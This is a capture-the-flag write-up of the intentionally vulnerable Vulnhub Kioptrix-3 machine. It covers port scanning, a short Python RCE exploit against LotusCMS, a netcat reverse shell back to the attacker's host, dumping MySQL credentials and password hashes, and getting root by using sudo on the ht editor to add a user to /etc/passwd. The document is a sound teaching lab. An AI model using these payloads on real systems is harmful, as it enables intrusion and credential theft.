Welcome to the Kioptrix-3 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Kioptrix-3

tags: Vulnhub Easy Linux OSCP
Platform: Vulnhub
Difficult: Easy
S.O.: Linux

Inside the box link, we can find this recomendation:
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

Kioptrix: Level 1.2 (#3)

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -Pn -T4 -p- 172.20.10.8
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 08:52 CEST
Nmap scan report for 172.20.10.8
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80 172.20.10.8
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 08:53 CEST
Nmap scan report for 172.20.10.8
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms 172.20.10.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds

Port 80

When we entered the website of port 80 we found a small blog in which in its first post New Gallery Online! They mention a photo gallery in the link http://kioptrix3.com/gallery.

Looking the source code of the website, we can find one admin login link commented.

<!--  <a href="gadmin">Admin</a>&nbsp;&nbsp; -->

Lotus CMS

Looking for vulnerabilities for Lotus CMS we can find an RCE in this link but I have only gotten the test injection to work.

Exploitation

Therefore, based on the repository exploit, we can write 6 very simple lines to get an RCE to play with.

import requests, sys, urllib.parse

s = requests.session()
payload = "');${"+sys.argv[2]+"};#"
template = s.get('http://'+sys.argv[1]+'/index.php?page=index').text
r = s.get('http://'+sys.argv[1]+'/index.php?page=index'+urllib.parse.quote_plus(payload))
print(r.text.replace(template, '').strip())

Let's try it!

$ python3 rce.py 172.20.10.8 "system('id')"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Great! Let's see if we can get a shell...

We are going to put a terminal to listen and try.

$ python3 rce.py 172.20.10.8 "system('nc -e /bin/bash 172.20.10.4 8787')"
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.8] 60573
python -c "import pty; pty.spawn('/bin/bash')"
[email protected]:/home/www/kioptrix3.com$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Post exploitation

Privilege escalation: www-data to loneferret

Enumeration

Inside the file /home/www/kioptrix3.com/gallery/gconfig.php we can find the MySQL credentials

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

MySQL

[email protected]:/home/www/kioptrix3.com/gallery$ mysql -u root -p'fuckeyou'
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| gallery            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+----------------------+
| Tables_in_gallery    |
+----------------------+
| dev_accounts         | 
| gallarific_comments  | 
| gallarific_galleries | 
| gallarific_photos    | 
| gallarific_settings  | 
| gallarific_stats     | 
| gallarific_users     | 
+----------------------+
7 rows in set (0.00 sec)

mysql> select * from gallarific_users;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype  | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
|      1 | admin    | n0t7t1k4 | superuser | Super     | User     |       | 1302628616 |         |           1 |       |          | 
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.01 sec)

mysql> select * from dev_accounts;
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 | 
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e | 
+----+------------+----------------------------------+
2 rows in set (0.00 sec)

Now we have the gallery credentials, and the dreg and loneferret passwords on MD5. Let's see if we can get the real passwords.
Using the website Crackstation we can get the passwords in plain text.

Post exploitation

Privilege escalation: loneferret to root

Enumeration

Sudo

[email protected]:/home/www/kioptrix3.com/gallery/photos$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

The ht binary is a text editor that thanks to sudo we can run with root permissions. Knowing this, we can get root in multiple ways.
We are going to inject a user with root permissions in the /etc/passwd file.

Exploitation

[email protected]:/home/www/kioptrix3.com/gallery/photos$ sudo /usr/local/bin/ht

To open the menu, we need tu press Alt+F and go to Open to choose a file.

Now we need to type the choosen file to edit.

Once the file is open, we add at the end the line with our user.

We need to press again Alt+F and select Save.

Now we just have to press Alt + F again and chooseQuit.

Now we should be able to authenticate with the injected user and we would be root!

[email protected]:/home/www/kioptrix3.com/gallery/photos$ su x4v1l0k
Password: 
[email protected]:/home/www/kioptrix3.com/gallery/photos# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/www/kioptrix3.com/gallery/photos#

And as we can see, this box of the series does have a flag.

[email protected]:/home/www/kioptrix3.com/gallery/photos# cd /root
[email protected]:~# ls
Congrats.txt  ht-2.0.18
[email protected]:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.

I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com

Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/

Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

[email protected]:~#